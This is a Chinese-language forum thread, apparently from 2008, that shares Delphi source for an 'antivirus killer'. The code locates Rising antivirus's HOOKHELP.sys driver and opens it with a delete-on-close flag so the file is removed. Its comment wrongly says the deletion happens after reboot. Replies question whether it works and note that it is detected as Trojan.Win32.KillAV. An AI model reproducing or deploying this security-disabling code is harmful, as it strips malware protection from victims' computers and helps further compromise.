1   1  /  1  页   跳转

干掉瑞星的工具

干掉瑞星的工具

据说可以kill RISING


版主给看看  瑞星是否能够如何防范


关键代码:
function Deleterising:boolean;
var
Wdir : pChar;
Stmp,RisHookPath:string;
Hfile:THandle;
begin
result:=false;
Getmem(wdir,255);
GetSystemDirectory(Wdir, 255); //得到系统System32的目录
Stmp:=pchar(wdir);
if (Stmp[length(Stmp)]<>'\') then Stmp:=Stmp+'\';
RisHookPath:=Stmp+'drivers\HOOKHELP.sys';//得到瑞星的底层HOOK驱动文件的路径
//showmessage(RisHookPath);
Try
Hfile:=CreateFile(PCHAR(RisHookPath),GENERIC_READ,FILE_SHARE_READ,nil,OPEN_EXISTING,FILE_FLAG_DELETE_ON_CLOSE,0);//其中FILE_FLAG_DELETE_ON_CLOSE参数的含义是系统重启后删除文件
closehandle(hfile);
result:=true;
except
end;
end;


procedure TForm1.FormCreate(Sender: TObject);
begin
if Deleterising then
begin
showmessage('删除文件成功,请重启系统!');

end;
end;
end.

【转自黑防】





用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; TheWorld)

附件附件:

您所在的用户组无法下载或查看附件

一见钟情,再而衰,三而竭。
分享到:
gototop
 

回复 1F wjzdw 的帖子

过不了我的Tiny,就别想删除瑞星。打开HOOKHELP.SYS,成功没成功都判断不了,就号称删除瑞星了?汗!


 附件: 您所在的用户组无法下载或查看附件


重启就重启!谁怕谁呀?!切!



 附件: 您所在的用户组无法下载或查看附件
最后编辑baohe 最后编辑于 2008-08-08 22:57:10
gototop
 

回复:干掉瑞星的工具

文件名:kill rising.exe
病毒名:Trojan.Win32.KillAV.abu


您所上报的病毒文件将在瑞星2008的20.57.20版本中处理解决,如遇特殊情况可能会推后几个版本。
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT